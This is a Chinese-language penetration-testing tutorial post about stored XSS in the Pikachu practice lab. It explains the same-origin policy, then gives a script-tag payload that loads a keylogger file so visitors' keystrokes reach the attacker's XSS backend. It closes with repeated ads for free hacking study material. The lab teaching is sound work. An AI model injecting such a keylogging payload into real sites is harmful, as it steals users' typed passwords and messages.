前言
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段XSS第3篇。
本阶段主要讲解XSS攻击XSS攻击获取键盘记录。
喜欢的朋友们,记得给大白点赞支持和收藏一下,关注我,学习黑客技术。
前备知识
跨域
跨域(Cross-Origin)是指在互联网中,浏览器为了保护用户信息安全而实施的一种安全策略——同源策略(Same-Origin Policy),即浏览器禁止一个域上的文档或者脚本(如通过JavaScript发起的HTTP请求)与另一个域上的资源进行交互,除非明确授权。
具体来说,如果两个网页的协议(HTTP/HTTPS)、域名、端口号完全一致,就被认为是同源。若从一个源(例如,域A)加载的网页中的脚本尝试访问或操作另一个不同源(例如,域B)的资源,这种行为就会被浏览器阻止,从而出现“跨域”问题。
跨域的主要目的是防止恶意网站通过嵌入的脚本获取并利用另一个网站的内容,比如用户的敏感信息,以避免诸如跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等安全风险。
解决跨域问题的方法有多种,包括但不限于:
CORS(Cross-Origin Resource Sharing,跨源资源共享):服务器通过响应头允许特定源进行跨域访问。
JSONP(JSON with Padding):通过动态创建
<script>
标签绕过同源策略,适用于GET请求。WebSocket可以通过指定协议握手实现跨域通信。
服务端代理:将请求转发到其他服务器,返回结果给客户端,让客户端看起来像是在和服务端同源通信。
window.postMessage API:在不同窗口间进行跨域通信。
WebRTC等现代Web技术也有相应的跨域机制。
通过存储xss漏洞,注入xss代码,进而获得用户的键盘记录
环境准备
1.安装好pikachu及其的后台
2.文件处理
1.rk.js 在pikachu\\pkxss\\rkeypress目录下
注:上述网址一定要与本机部署的pikachu的网址一致才行,此网址也为攻击者的文件网址
此处我的pikachu网址直接为localhost,即127.0.0.1
本质该网址就为http://+‘pikachu网址’+/pkxss/rkeypress/rkserver.php
实战
先上payload:
<script src=" http://127.0.0.1/pkxss/rkeypress/rk.js"> </script>
注意:payload对应的网址也应与rs.js文件中的网址一致
查看控制台,如果有除了以下的显示内容,可能就是上述网址填错了,请认真修改!
此时,我们已经将rk.js文件上传到了被攻击者网站中,当有人访问该网页,并留言,我们就可以在xss后台看到该人的键盘记录,如下演示
去往pikachu后台,即可查看到
总结
此处xss漏洞主要利用src属性的跨站访问,使得被攻击者可以通过src属性自动跳转到攻击者的xss平台,祝各位学习顺利!
为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
[2024最新CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
[2024最新CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取